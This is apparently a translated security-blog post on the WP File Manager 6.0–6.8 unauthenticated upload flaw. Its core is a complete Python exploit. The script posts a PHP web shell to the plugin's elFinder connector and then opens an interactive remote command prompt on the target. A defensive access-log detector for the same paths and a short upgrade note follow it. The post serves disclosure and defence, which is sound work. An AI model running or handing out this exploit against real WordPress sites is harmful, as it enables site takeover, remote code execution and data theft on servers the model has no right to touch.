0x00 Introduction
WordPress is a blogging platform written in PHP; users can set up their own website on any server that supports PHP and a MySQL database. WordPress can also be used as a content management system (CMS).
File Manager lets you edit, delete, upload, download, zip, copy and paste files and folders directly from the WordPress backend. No need to bother with FTP to manage files or move them from one location to another. The most powerful, flexible and easiest WordPress file management solution ever!
0x01 Vulnerability overview
When security researchers looked into it, they quickly found a critical 0-day vulnerability in the WordPress plugin WP File Manager: an attacker can upload arbitrary files and execute code remotely on any WordPress site that has the plugin installed.
An attacker could take whatever action they choose: steal private data, deface the site, or use the site to launch further attacks against other sites or infrastructure.
0x02 Affected versions
WP File Manager 6.0 to 6.8
0x03 Environment setup
WordPress 5.4.1
https://cn.wordpress.org/wordpress-5.4.1-zh_CN.tar.gz
wp-file-manager 6.0
https://wwe.lanzous.com/iN0A7hafg4h
0x04 Exploitation
Use the Python script below; if you run it under Python 2, remember to change input to raw_input.
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
"""
@Author : xDroid
@File : wp.py
@Time : 2020/9/21
"""
import requests
requests.packages.urllib3.disable_warnings()
from hashlib import md5
import random
import json
import optparse
import sys

GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
ENDC = '\033[0m'
# Send traffic through a local intercepting proxy (e.g. Burp on 8080)
proxies = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}


def randmd5():
    # Random six-character name for the uploaded file
    new_md5 = md5()
    new_md5.update(str(random.randint(1, 1000)).encode())
    return new_md5.hexdigest()[:6] + '.php'


def file_manager(url):
    if not url:
        print('#Usage : python3 file_manager_upload.py -u http://127.0.0.1')
        sys.exit()
    # The elFinder connector shipped with the plugin, reachable without authentication
    vuln_url = url.strip() + "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
    filename = randmd5()
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0',
        'Content-Type': 'multipart/form-data;boundary=---------------------------42474892822150178483835528074'
    }
    # Multipart body for the elFinder "upload" command
    data = "-----------------------------42474892822150178483835528074\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n1744f7298611ba\r\n-----------------------------42474892822150178483835528074\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------42474892822150178483835528074\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------42474892822150178483835528074\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"%s\"\r\nContent-Type: application/php\r\n\r\n<?php system($_GET['cmd']); ?>\r\n-----------------------------42474892822150178483835528074\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n1597850374\r\n-----------------------------42474892822150178483835528074--\r\n" % filename
    try:
        resp = requests.post(url=vuln_url, headers=headers, data=data, timeout=3, verify=False, proxies=proxies)
        result = json.loads(resp.text)
        # elFinder answers with the list of added files; check that ours is among them
        if filename == result['added'][0]['url'].split('/')[-1]:
            print(GREEN + '[+]\t\t' + ENDC + YELLOW + 'File Uploaded Success\t\t' + ENDC)
            while True:
                command = input("请输入执行的命令:")
                if "q" == command:
                    sys.exit()
                # Uploaded files are served from lib/files/
                exec_url = url + '/wp-content/plugins/wp-file-manager/lib/files/' + filename + '?cmd=' + command.strip()
                exec_resp = requests.get(url=exec_url)
                exec_resp.encoding = 'gb2312'
                print(exec_resp.text)
        else:
            print(RED + '[-]\t\tUploaded failed\t\t' + ENDC)
    except Exception as e:
        print(RED + '[-]\t\tUploaded failed\t\t' + ENDC)


if __name__ == '__main__':
    banner = GREEN + '''
  __ _ _
 / _(_) | ___   _ __ ___   __ _ _ __   __ _  __ _  ___ _ __
| |_| | |/ _ \ | '_ ` _ \ / _` | '_ \ / _` |/ _` |/ _ \ '__|
|  _| | |  __/ | | | | | | (_| | | | | (_| | (_| |  __/ |
|_| |_|_|\___| |_| |_| |_|\__,_|_| |_|\__,_|\__, |\___|_|
                                            |___/
                                by: Timeline Sec
                file manager 6.0-6.8 file upload
    ''' + ENDC
    print(banner)
    parser = optparse.OptionParser('python3 %prog -h')
    parser.add_option('-u', dest='url', type='str', help='wordpress url')
    (options, args) = parser.parse_args()
    file_manager(options.url)
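The script above touches two plugin paths: the elFinder connector under lib/php/ that accepts the unauthenticated upload, and the lib/files/ directory the uploaded file is then served from. As an added defensive example (not part of the original post), the following Python snippet scans web-server access-log lines for exactly those two paths and correlates clients that hit both; the log lines are constructed samples and the alert names are my own.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# Paths from the exploit flow above: the elFinder connector that accepts the
# unauthenticated "upload" command, and the directory the upload lands in.
CONNECTOR_PATH = "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
UPLOAD_DIR = "/wp-content/plugins/wp-file-manager/lib/files/"

# Combined log format (Apache/nginx); only the fields the rules need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (not real traffic): one exploit sequence plus two benign hits.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Sep/2020:10:15:01 +0800] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 187',
    '203.0.113.7 - - [21/Sep/2020:10:15:03 +0800] "GET /wp-content/plugins/wp-file-manager/lib/files/1a2b3c.php?cmd=whoami HTTP/1.1" 200 54',
    '198.51.100.2 - - [21/Sep/2020:10:16:40 +0800] "GET /wp-content/plugins/wp-file-manager/lib/files/report.pdf HTTP/1.1" 200 20481',
    '198.51.100.2 - - [21/Sep/2020:10:17:12 +0800] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 64',
]

def classify(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (alert, ip, path) for a suspicious line, or None if benign or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = urlsplit(m.group("target")).path  # strip the query string before matching
    if path == CONNECTOR_PATH and m.group("method") == "POST":
        # Direct POSTs to the connector never pass through WordPress's capability checks.
        return ("wpfm_connector_post", m.group("ip"), path)
    if path.startswith(UPLOAD_DIR) and path.lower().endswith(".php"):
        # A PHP file requested out of lib/files/ means an upload has already succeeded.
        return ("wpfm_php_in_files_dir", m.group("ip"), path)
    return None

def scan(lines: List[str]) -> Dict[str, List[Tuple[str, str]]]:
    """Group alerts by name; each entry is (client ip, request path)."""
    alerts: Dict[str, List[Tuple[str, str]]] = {}
    for line in lines:
        hit = classify(line)
        if hit:
            alerts.setdefault(hit[0], []).append((hit[1], hit[2]))
    return alerts

def attacker_ips(alerts: Dict[str, List[Tuple[str, str]]]) -> List[str]:
    """IPs that both posted to the connector and fetched PHP from lib/files/."""
    posted = {ip for ip, _ in alerts.get("wpfm_connector_post", [])}
    fetched = {ip for ip, _ in alerts.get("wpfm_php_in_files_dir", [])}
    return sorted(posted & fetched)

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for name, hits in found.items():
        print(name, hits)
    print("correlated:", attacker_ips(found))
```

A single match on the first rule is already worth investigating on sites that are not supposed to expose the connector; the correlation in attacker_ips only narrows the list when both stages are visible in the same log.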
0x05 Remediation
Upgrade WP File Manager to version 6.9.
References: